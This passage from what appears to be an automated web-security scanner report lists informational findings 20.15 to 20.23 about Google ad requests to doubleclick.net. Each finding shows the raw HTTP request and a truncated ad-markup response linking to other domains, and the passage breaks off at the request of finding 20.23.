%26adurl%3Dhttp://www.Campaigner.com/%253Futm_source%253Dgoogle%2526utm_medium%253Dcpc%2526utm_term%253DEmail%252520marketing%2526utm_content%253Demail%252520marketing%2526utm_campaign%253DGc_EMexact"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJKlm565s-yHAhCsAhj6ATIIKcLEODAr9v0" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB987Lx9S2TfixPJHUsAeHjZ0yy62MxAHDipzlGMCNtwHwzpMEEAEYASDg7M4DOABQ1tG85gFgye6DiPCj7BKgAcmdqfcDsgEQd3d3LnNwYW1sYXdzLmNvbboBCjMwMHgyNTBfYXPIAQTaASlodHRwOi8vd3d3LnNwYW1sYXdzLmNvbS9zcGFtLWJsb2NrZXIuaHRtbOABA7gCGMgCy9r7E6gDAegDugLoA4oD9QMAAADE%26num%3D1%26sig%3DAGiWqtxA5VINKMw4hY7AmK6NViy708GLJg%26client%3Dca-pub-5253809430940410%26adurl%3Dhttp://www.Campaigner.com/%253Futm_source%253Dgoogle%2526utm_medium%253Dcpc%2526utm_term%253DEmail%252520marketing%2526utm_content%253Demail%252520marketing%2526utm_campaign%253DGc_EMexact" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.spamlaws.com/spam-blocker.html%26hl%3Den%26client%3Dca-pub-5253809430940410%26adU%3Dwww.campaigner.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF9FEflVSvtXIWYjL_wnV_p2WRhtQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835639&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fdsaddthiscom%2Fnginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html&dt=1303817724379&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817724385&frm=0&adk=1607234649&ga_vid=964658393.1303817724&ga_sid=1303817724&ga_hid=1103745835&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=10&xpc=3MAqWaj0cT&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 11:35:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/dsaddthiscom/nginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%26adU%3Dwww.UAT.edu/ia%26adT%3DHacker%2BMasters%26adU%3Dwww.privateinvestigatorchicago.com%26adT%3DHeritage%2BInvestigations%26gl%3DUS&amp;usg=AFQjCNECKJqNegUsBbJSCfrsQwmO7U_Gxw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801106&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783143017&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303783143025&frm=0&adk=1607234649&ga_vid=2091087362.1303783143&ga_sid=1303783143&ga_hid=1637931588&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=17&xpc=5bvonzgYDQ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:58:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/learnbridgefrontcom/dom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.publishorperish.com%26adT%3DGoldMine%2BTraining%2BClasses%26adU%3Dwww.taylorandfrancis.com/Immunology%26adT%3DBe%2BPrepared%2BFor%2BFinals%26adU%3Dwww.lynda.com%26adT%3DHTML%2BTutorials%26gl%3DUS&amp;usg=AFQjCNG22R7uBL9cSYRbq2X_R6FeJvNgTw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842225&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Freflected-xss-account.snap.com_443.htm&dt=1303824225651&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824225657&frm=0&adk=1819763764&ga_vid=350171340.1303824226&ga_sid=1303824226&ga_hid=1804120403&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=18&xpc=2QTH1l6RJA&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:23:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/reflected-xss-account.snap.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/rms-data%26adT%3DRMS%2BData%2BAccess%26adU%3Dwww.Confio.com/Ignite8%26adT%3DSQL%2BServer%2B2005%2BTool%26gl%3DUS&amp;usg=AFQjCNHNWQ1jnc23SY1UrR-Gbfm7_JSgug" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842170&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Floginsisnacom%2Fsql-injection-reflected-xss-cross-site-scripting-example-poc-report.html&dt=1303824170411&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824170692&frm=0&adk=1607234649&ga_vid=494482213.1303824171&ga_sid=1303824171&ga_hid=1147087629&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=468&xpc=d7KWzTUkvG&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:22:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12647

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/loginsisnacom/sql-injection-reflected-xss-cross-site-scripting-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26gl%3DUS&amp;usg=AFQjCNEkNd3CDarozCUAjrs0POL3EYlvwg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=250&slotname=0023118579&w=300&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665880&bpp=2&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904&correlator=1303827663964&frm=0&adk=386104450&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=4&dtd=13&xpc=eDrJOLuMc9&p=http%3A//www.spamlaws.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 14:20:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4355

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.spamlaws.com/spam-blocker.html%26hl%3Den%26client%3Dca-pub-5253809430940410%26adU%3DAVG.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHI7n4nHWtkg5BgekpCAiFpZHnGCQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842233&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824233832&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824233843&frm=0&adk=1819763764&ga_vid=1513645573.1303824234&ga_sid=1303824234&ga_hid=2021737263&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=17&xpc=vXrwcSbu7W&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:23:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2BDrivers%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26gl%3DUS&amp;usg=AFQjCNFKha0rvVJDAQKvBPwj7FnBS26nCQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800187&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm&dt=1303782344238&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303782344243&frm=0&adk=1819763764&ga_vid=1662193110.1303782344&ga_sid=1303782344&ga_hid=795164437&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=923&bih=928&fu=0&ifi=1&dtd=10&xpc=7ycypngpbD&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:45:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4354

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGcK1B6GsMnbngdSwhutVGcP_5rWg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801135&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783135631&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303783135647&frm=0&adk=1607234649&ga_vid=121072238.1303783136&ga_sid=1303783136&ga_hid=1656635059&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=44&xpc=XMjcqaQePY&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:58:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4411

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/learnbridgefrontcom/dom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com/SportKayaks.aspx%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG8scC99pa3vT20J3lgrJlU_wZS3Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

